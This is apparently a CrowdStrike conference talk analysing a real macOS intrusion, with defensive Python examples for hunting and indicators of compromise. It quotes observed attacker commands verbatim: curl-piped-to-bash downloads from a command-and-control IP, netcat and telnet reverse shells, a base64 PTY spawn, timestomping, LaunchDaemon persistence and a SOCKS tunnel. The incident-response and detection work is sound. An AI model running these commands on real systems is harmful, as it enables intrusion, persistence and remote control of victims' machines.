Macdoored: A First Look Into Real-World Macos Intrusions

This document provides an overview of real-world macOS intrusions from the perspective of a CrowdStrike security researcher. It describes how macOS intrusions can be difficult to detect due to similarities between admin and attacker activity. It then outlines the steps an attacker took in one intrusion which included installing a backdoor, using it for reconnaissance, making the backdoor persistent, and attempting lateral movement. It concludes by providing indicators associated with the intrusion and discussing challenges in macOS detection and analysis.


MACDOORED

A FIRST LOOK INTO REAL-WORLD MACOS INTRUSIONS

2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


JARON BRADLEY
SENIOR SECURITY RESEARCH DEVELOPER, CROWDSTRIKE

JARON BRADLEY started his career out of college as an incident responder. He originally joined CrowdStrike on what is now known as the OverWatch team, sifting through customer data and looking for malicious activity. He then moved to the Engine Content and Detections team, where he focused on writing detections for the macOS sensor. He now works on the Strategic Counter-Adversarial Research team developing and enabling new ways to catch malicious actors within customer networks. Jaron is the author of OS X Incident Response: Scripting and Analysis.
Macdoored Agenda

1 Mac Hunting Overview

2 Detections in the Wild

3 Detection and Analysis Difficulties

4 Attacker Intrusions

5 Wrap-up

Macdoored by Jaron Bradley


THE IMPORTANCE OF THE PROCESS TREE

Sudoers file modified, process tree:
launchd -> jamf -> bash -> vim

Sudoers file modified, process tree:
launchd -> /var/tmp/a -> bash -> vim

At the command level both edits look identical (vim writing the sudoers file); only the ancestor tells a management tool (jamf) apart from an unknown binary running out of /var/tmp.
DETECTION/ANALYSIS DIFFICULTIES
§ All the commands an attacker could ever need are on the system

§ Admin and Attacker activity can look like the same thing

§ Backdoors can be written in many different languages

§ Malware sample size incredibly small compared to Windows


THE INTRUSION

Process tree: launchd -> sshd -> bash, with every piece of attacker activity spawned as a child of that bash.



RECON

Process tree: launchd -> sshd -> bash, running:

sw_vers
system_profiler
dscl . -list /Users
ping -c1 <system>
dig <host>
dns-sd -B <service>
BACKDOOR

BACKDOOR INSTALLATION

Process tree: launchd -> sshd -> bash, running:

curl -O hxxp://61.78.62.21:8080/Tssd
chmod +x Tssd
mv /var/tmp/Tssd rutil
touch -r r2util rutil
ls -la /usr/local/bin/rutil
vim /etc/.cache
chmod 400 .cache


BACKDOOR VARIANTS

System 1: launchd -> sshd -> bash -> curl -O hxxp://61.78.62.21:8080/Tssd
System 2: launchd -> sshd -> bash -> curl -O hxxp://61.78.62.21:8080/Tss
System 3: launchd -> sshd -> bash -> curl -sO hxxp://61.78.62.21:8080/grrs

All three systems pull the backdoor from 61.78.62.21, attributed to WICKED PANDA.
CURL ALL THE THINGS

Process tree: launchd -> rutil -> bash, running:

curl -O hxxp://61.78.62.21:8080/1.txt -o /var/tmp/1.txt
curl hxxp://61.78.62.21:8080/5.txt | bash
curl hxxp://61.78.62.21:8080/5.txt%20|%20bash
curl hxxp://61.78.62.21:8080/5.txt%20|%20bash
curl hxxp://61.78.62.21:8080/5.txt\x7cbash
curl hxxp://61.78.62.21:8080/5.txt%7cbash
curl hxxp://61.78.62.21:8080/5.txt || bash
curl hxxp://61.78.62.21:8080/x
QUICK HUNTING NOTE

curl malz.txt | dd xyz | bash

bash (parent)   PID = 1   PGID = x
  curl          PID = 2   PGID = 2
  dd            PID = 3   PGID = 2
  bash          PID = 4   PGID = 2

Every stage of the pipeline lands in the process group led by its first command (curl, whose PID becomes the PGID), while the parent shell keeps its own group. Hunting on PGID therefore ties the download to the interpreter that ran it even when an arbitrary command is wedged in between.
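The hunting note above, as an added example that is not code from the talk: group process records by PGID and flag any group that holds both a downloader and an interpreter, which catches the slide's `curl | dd | bash` pipeline without caring what sits in the middle. The process records are constructed to mirror the slide's PIDs; on a live host they would come from `ps -axo pid,ppid,pgid,comm,args` or an EDR process feed, and the downloader and interpreter name sets are assumptions to tune per environment.

```python
"""Hunt download-and-execute pipelines by process group.

Added example (not code from the talk). Every stage of a shell pipeline
shares the process group ID (PGID) of the first command, so
`curl malz.txt | dd xyz | bash` is still one group when an unrelated
command (dd) sits between the downloader and the interpreter.
"""
from collections import defaultdict

# Assumed name sets; extend for the environment being hunted.
DOWNLOADERS = {"curl", "wget", "nc", "telnet"}
INTERPRETERS = {"bash", "sh", "zsh", "python", "perl", "ruby", "osascript"}

# Constructed sample. PID 1 is the interactive shell in its own group; PIDs
# 2-4 are the three stages of the slide's pipeline, all in group 2 (curl is
# the group leader because it was the first stage). PIDs 5-6 are a benign
# pipeline for contrast.
SAMPLE_PROCESSES = [
    {"pid": 1, "ppid": 0, "pgid": 1, "comm": "bash", "args": "bash"},
    {"pid": 2, "ppid": 1, "pgid": 2, "comm": "curl", "args": "curl malz.txt"},
    {"pid": 3, "ppid": 1, "pgid": 2, "comm": "dd",   "args": "dd xyz"},
    {"pid": 4, "ppid": 1, "pgid": 2, "comm": "bash", "args": "bash"},
    {"pid": 5, "ppid": 1, "pgid": 5, "comm": "cat",  "args": "cat file"},
    {"pid": 6, "ppid": 1, "pgid": 5, "comm": "grep", "args": "grep ssh"},
]


def find_download_exec_groups(processes):
    """Return {pgid: [stage args in pid order]} for every process group that
    holds both a downloader and an interpreter. Grouping on PGID rather than
    walking parent/child links is what lets the dd in the middle be ignored."""
    groups = defaultdict(list)
    for proc in processes:
        groups[proc["pgid"]].append(proc)

    hits = {}
    for pgid, members in groups.items():
        names = {m["comm"] for m in members}
        if names & DOWNLOADERS and names & INTERPRETERS:
            hits[pgid] = [m["args"] for m in sorted(members, key=lambda m: m["pid"])]
    return hits


def group_leader(processes, pgid):
    """The first pipeline stage: the member whose PID equals the PGID."""
    return next((p for p in processes if p["pid"] == pgid), None)


if __name__ == "__main__":
    for pgid, stages in find_download_exec_groups(SAMPLE_PROCESSES).items():
        leader = group_leader(SAMPLE_PROCESSES, pgid)
        print(f"PGID {pgid} (leader {leader['comm']}): " + " | ".join(stages))
```

The benign `cat | grep` group is left alone because it contains no downloader; only the pipeline whose leader is curl is reported.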
WHOOPS…

Process tree: launchd -> sshd -> bash, running:

nc 61.78.62.21 53 -e /bin/sh
nc -e /bin/sh 61.78.62.21 53
nc --e /bin/sh 61.78.62.21 53
nc --exec /bin/sh 61.78.62.21 53
/bin/sh | nc 61.78.62.21 53
mknod /tmp/p p && telnet 61.78.62.21 53 0/tmp/p

The netcat shipped with macOS has no -e/--exec option, so the attacker cycles through variants that all fail before falling back to a pipe and then a named pipe with telnet.


PERSISTENCE
TYPICAL PERSISTENCE
System Integrity Protection Level
/System/Library/LaunchDaemons
/System/Library/LaunchAgents

Root Level
/Library/LaunchDaemons
/Library/LaunchAgents

User Level
/Users/$USER/Library/LaunchDaemons
/Users/$USER/Library/LaunchAgents
PERSISTENCE

Process tree: launchd -> sshd -> bash, running:

vim /Library/LaunchDaemons/com.apple.xsprinter.plist
launchctl load -w /Library/LaunchDaemons/com.apple.xsprinter.plist
MORE THAN JUST A SYSTEM CHECK

Process tree: launchd -> sshd -> bash, running:

touch /usr/bin/x
rm -rf /usr/bin/x
uname -an
system_profiler SPHardwareDataYpe
system_profiler SPHardwareDataType
  -> /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full

Creating and deleting a file in /usr/bin tests whether that directory is writable, which System Integrity Protection prevents on 10.11 and later, so the "system check" also tells the attacker where persistence can go.
YOSEMITE PERSISTENCE

Process tree: launchd -> sshd -> bash, running:

/System/Library/LaunchDaemons/com.apple.xsprinter.plist
touch -r ssh.plist com.apple.xsprinter.plist
launchctl load -w /System/Library/LaunchDaemons/com.apple.xsprinter.plist

Yosemite (10.10) predates System Integrity Protection, so root can still write into /System/Library/LaunchDaemons; copying the timestamps from ssh.plist makes the new file blend in with its neighbours.
PERSISTENCE PIGGYBACKING

CLEANUP

MINOR STEALTH

Process tree: launchd -> rutil -> bash (C2: 61.78.62.21), running:

rm /tmp/x
touch -r r2util rutil
touch -r profile .cache
touch -r com.cisco.anyconnect.aciseagentd.plist com.apple.xsprinter.plist
ssh user@ip -o UserKnownHostsFile=/dev/null
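The persistence and cleanup slides together give a defender three things to check in a LaunchDaemon plist: an Apple-looking label outside /System/Library, a program in a user-writable path, and timestamps copied with `touch -r`. As an added example (not the talk's code), the audit below applies all three. The plist bytes and stat values are constructed so it runs off a Mac; on macOS the inputs would be the real file bytes and `os.stat()` values (`st_mtime`, `st_ctime`, `st_birthtime`), and the directory lists and one-day gap are assumed thresholds.

```python
"""Audit LaunchDaemon/LaunchAgent plists for the persistence and cleanup
tricks on the slides. Added example, not the talk's code.

Findings raised per plist:
  * an Apple-looking Label (com.apple.*) outside /System/Library, where
    Apple's own daemons live (the intrusion's com.apple.xsprinter.plist sat
    in /Library/LaunchDaemons);
  * a program in a user-writable, non-Apple directory such as
    /usr/local/bin/rutil;
  * `touch -r` timestomping: touch -r copies the reference file's atime and
    mtime but cannot set ctime, which the kernel bumps to "now", so a ctime
    far newer than the mtime means the file changed after its visible
    timestamps claim; an mtime older than the birthtime points the same way.
"""
import plistlib
from datetime import datetime, timedelta
from xml.parsers.expat import ExpatError

# Assumed thresholds and directory lists.
APPLE_ONLY_DIRS = ("/System/Library/LaunchDaemons", "/System/Library/LaunchAgents")
WRITABLE_PROGRAM_DIRS = ("/usr/local/bin", "/usr/local/sbin", "/var/tmp", "/tmp", "/Users/Shared")
CTIME_MTIME_GAP = timedelta(days=1)

# Constructed timestamps: an old mtime copied by touch -r and a recent ctime.
SAMPLE_MTIME = datetime(2014, 10, 16)
SAMPLE_CTIME = datetime(2018, 7, 1)

# Constructed plist using the label and path from the slides; the other keys
# are ordinary launchd boilerplate, not taken from the intrusion.
ATTACKER_PLIST = plistlib.dumps({
    "Label": "com.apple.xsprinter",
    "ProgramArguments": ["/usr/local/bin/rutil"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

# Constructed benign third-party daemon for contrast (label from the slide,
# program path assumed).
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.cisco.anyconnect.aciseagentd",
    "ProgramArguments": ["/opt/cisco/anyconnect/bin/aciseagentd"],
    "RunAtLoad": True,
})


def audit_plist(path, data, mtime, ctime, birthtime=None):
    """Return a list of finding strings for one plist (empty when clean)."""
    try:
        plist = plistlib.loads(data)
    except (plistlib.InvalidFileException, ExpatError):
        return ["unparseable plist"]

    findings = []
    label = str(plist.get("Label", ""))
    program = plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]

    if label.startswith("com.apple.") and not path.startswith(APPLE_ONLY_DIRS):
        findings.append(f"Apple-style label {label!r} outside /System/Library")
    if program.startswith(WRITABLE_PROGRAM_DIRS):
        findings.append(f"program in user-writable path {program!r}")
    if ctime - mtime > CTIME_MTIME_GAP:
        findings.append(f"ctime {ctime:%Y-%m-%d} far newer than mtime {mtime:%Y-%m-%d}: possible touch -r")
    # cp -p and similar also preserve mtime, so this one is a hint, not proof.
    if birthtime is not None and mtime < birthtime:
        findings.append("mtime predates file creation (birthtime): possible touch -r")
    return findings


if __name__ == "__main__":
    for finding in audit_plist("/Library/LaunchDaemons/com.apple.xsprinter.plist",
                               ATTACKER_PLIST, SAMPLE_MTIME, SAMPLE_CTIME, SAMPLE_CTIME):
        print("-", finding)
```

The same plist dropped into /System/Library/LaunchDaemons on a pre-SIP system would pass the label check and be caught only by its program path, which is why the path rule matters as much as the label rule.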


LATERAL MOVEMENT

Process tree: launchd -> rutil -> bash (C2: 61.78.62.21), running:

grep ssh .bash_history
cat known_hosts
curl -sO hxxp://61.78.62.21:8080/rs
ssh -TNfq -Frs
ssh -o UserKnownHostsFile=/dev/null <ip>
ssh user@ip -o UserKnownHostsFile=/dev/null

On the target the session then shows up as launchd -> sshd -> bash -> sw_vers.


SUDO

PTY|TTY

§ python -c import base64;exec(base64.b64decode('aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vYmFzaCcp'));

The base64 decodes to import pty;pty.spawn('/bin/bash'): the backdoor's shell has no controlling terminal, and sudo will not prompt for a password without one, so the attacker spawns a PTY first.
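The one-liner on the SUDO slide hides its purpose behind base64, so the string to alert on is the decoded payload, not the blob. As an added example (not the talk's code), the decoder below pulls the blob out of an `exec(base64.b64decode('...'))` wrapper, tolerates missing padding and the line wrap the slide itself introduces, and recurses in case the decoded text is another wrapper. The sample command line is constructed from the slide; the nested sample and the PTY signature list are assumptions.

```python
"""Unwrap `python -c "... exec(base64.b64decode('...'))"` one-liners found in
process command lines. Added example, not the talk's code.
"""
import base64
import binascii
import re

B64_EXEC = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
PTY_SIGNS = ("pty.spawn", "pty.fork", "os.openpty")   # assumed signature list

# Constructed from the slide, including its line wrap inside the blob.
SLIDE_CMD = ("python -c import base64;exec(base64.b64decode("
             "'aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vY\nmFzaCcp'));")

# Constructed two-layer wrapper: the slide's command wrapped in base64 again.
_INNER = ("import base64;exec(base64.b64decode("
          "'aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vYmFzaCcp'))")
NESTED_CMD = "python -c \"import base64;exec(base64.b64decode('%s'))\"" % (
    base64.b64encode(_INNER.encode()).decode())


def decode_blob(blob: str) -> str:
    """Base64-decode a blob, ignoring embedded whitespace and fixing padding."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")


def unwrap_payloads(cmdline: str, depth: int = 3):
    """Return every decoded layer found in a command line, innermost last."""
    layers = []
    current = cmdline
    for _ in range(depth):
        match = B64_EXEC.search(current)
        if not match:
            break
        try:
            current = decode_blob(match.group(1))
        except (binascii.Error, ValueError):
            break
        layers.append(current)
    return layers


def pty_spawn_in(cmdline: str) -> bool:
    """True when the raw line or any decoded layer allocates a PTY."""
    texts = [cmdline, *unwrap_payloads(cmdline)]
    return any(sig in text for text in texts for sig in PTY_SIGNS)


if __name__ == "__main__":
    for cmd in (SLIDE_CMD, NESTED_CMD):
        for depth, layer in enumerate(unwrap_payloads(cmd), 1):
            print(f"layer {depth}: {layer}")
        print("pty spawn:", pty_spawn_in(cmd))
```

Feeding the decoded layers back into the same rule set used for command lines is the point: the signature fires on `pty.spawn` whether it appears in clear text or two base64 layers down.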
STATIC INDICATORS
§ https://github.com/jbradley89/shakacon-yara

§ Backdoor
§ 8029e7b12742d67fe13fcd53953e6b03ca4fa09b1d5755f8f8289eac08366efc
§ a5f7b13d0f259277e40e3711070121e451415d7d3a5e68382fc82c2fe3635db1
§ 5b0cc5dd2897e697751b8204d8b74edd66466d651d233c76899c5521a60f6527

§ IPs
§ 61.78.62[.]21 (C2)

§ Backdoor File Names
§ /usr/local/bin/google-updater
§ /usr/local/bin/prl-monitor
§ /usr/local/bin/git-lf
§ /usr/local/sbin/nortonscanner
§ /usr/local/plutil

§ LaunchDaemon File Names
§ /Library/LaunchDaemons/com.apple.xsprinter.plist
§ /System/Library/LaunchDaemons/com.apple.xsprinter.plist
WICKED PANDAS?

Process tree: launchd -> sshd -> bash, running:

curl -o /usr/local/bin/softwareupdated 45.77.129.251:11/asd
chmod +x softwareupdated
./softwareupdated
curl -o asd 45.77.129.251:11/asd
mv asd /Library/LaunchDaemons/local.localhost.startup.plist
ssh -oUserKnownHostsFile=/dev/null -oStrictHostKeyChecking=no ….

PASTEBIN

Process tree: launchd -> softwareupdated -> bash, running:

curl https://pastebin.com/raw/HEmKr39h
perl
EXFIL

Process tree: launchd -> softwareupdated -> bash, running:

curl -o update 45.77.129.251:11/asd
chmod +x update
<commands staging exfil>
nohup ./update -s rssocks -d 45.77.129.251 -e 44257
§ Twitter: @jbradley89

§ Questions?
